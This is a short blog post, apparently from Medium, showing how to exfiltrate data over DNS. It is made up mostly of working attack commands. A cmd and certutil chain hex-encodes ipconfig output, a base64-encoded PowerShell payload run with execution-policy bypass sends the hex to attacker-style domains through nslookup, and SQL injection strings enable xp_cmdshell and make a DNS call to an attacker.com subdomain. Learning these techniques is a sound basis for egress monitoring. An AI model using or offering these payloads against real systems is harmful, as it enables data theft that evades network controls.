PowerShell — Data Ex-filtration over DNS (OOB)

Egress filtering: is the practice of monitoring and potentially restricting the flow of information outbound from one network to another

DNS Ex-filtration

cmd /v /c ipconfig > C:\Windows\Temp\output70 && certutil -encodehex -f C:\Windows\Temp\output70 C:\Windows\Temp\output70.hex 4 && powershell.exe -exec bypass -enc JAB0AGUAeAB0AD0ARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABvAHUAdABwAHUAdAA3ADAALgBoAGUAeAA7ACQAcwB1AGIAZABvAG0AYQBpAG4APQAkAHQAZQB4AHQALgByAGUAcABsAGEAYwBlACgAIgAgACIALAAiACIAKQA7ACQAagA9ADEAMQAxADEAMQA7AGYAbwByAGUAYQBjAGgAKAAkAGkAIABpAG4AIAAkAHMAdQBiAGQAbwBtAGEAaQBuACkAewAgACQAZgBpAG4AYQBsAD0AJABqAC4AdABvAHMAdAByAGkAbgBnACgAKQArACIALgAiACsAJABpACsAIgAuAGYAaQBsAGUALgB1AHMAZQByADcAMAAuAHcAZQBiAGgAYQBjAGsAbABhAGIALgBjAG8AbQAiADsAJABqACAAKwA9ACAAMQA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ATgBvAE4AZQB3AFcAaQBuAGQAbwB3ACAAbgBzAGwAbwBvAGsAdQBwACAAJABmAGkAbgBhAGwAIAB9AA==

cmd /v /c “ipconfig > C:\Windows\Temp\outab && certutil -encodehex -f C:\Windows\Temp\outab C:\Windows\Temp\outab.hex 4

output in hex format

This will be the Hex value you can decode it using: https://gchq.github.io/CyberChef “ HEX”

powershell.exe -exec bypass -enc JAB0AGUAeAB0AD0ARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAQwA6AFwAVQBzAGUAcgBzAFwASQBSAEgAUABcAEQAZQBzAGsAdABvAHAAXABvAHUAdABwAHUAdAA3ADAALgBoAGUAeAA7ACQAcwB1AGIAZABvAG0AYQBpAG4APQAkAHQAZQB4AHQALgByAGUAcABsAGEAYwBlACgAIgAgACIALAAiACIAKQA7ACQAagA9ADEAMQAxADEAMQA7AGYAbwByAGUAYQBjAGgAKAAkAGkAIABpAG4AIAAkAHMAdQBiAGQAbwBtAGEAaQBuACkAewAgACQAZgBpAG4AYQBsAD0AJABqAC4AdABvAHMAdAByAGkAbgBnACgAKQArACIALgAiACsAJABpACsAIgAuAGYAaQBsAGUALgBkAG4AcwBwAGUAbgAuAGEAdAB0AGEAYwBrAGUAcgAuAGMAbwBtACIAOwAkAGoAIAArAD0AIAAxADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBOAG8ATgBlAHcAVwBpAG4AZABvAHcAIABuAHMAbABvAG8AawB1AHAAIAAkAGYAaQBuAGEAbAAgAH0A

$text=Get-Content C:\Windows\Temp\output70.hex;$subdomain=$text.replace(“ “,””);$j=11111;foreach($i in $subdomain){ $final=$j.tostring()+”.”+$i+”.file.dnspen.redacted.com”;$j += 1; Start-Process -NoNewWindow nslookup $final }

encoding PowerShell
Hex-Encoded

‘;exec sp_configure ‘show advanced options’, 1;RECONFIGURE;EXEC
sp_configure ‘xp_cmdshell’, 1;RECONFIGURE; —

‘;exec master..xp_cmdshell ‘cmd.exe /c nslookup ​tester​.dnspen​X​.attacker.com’; —

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store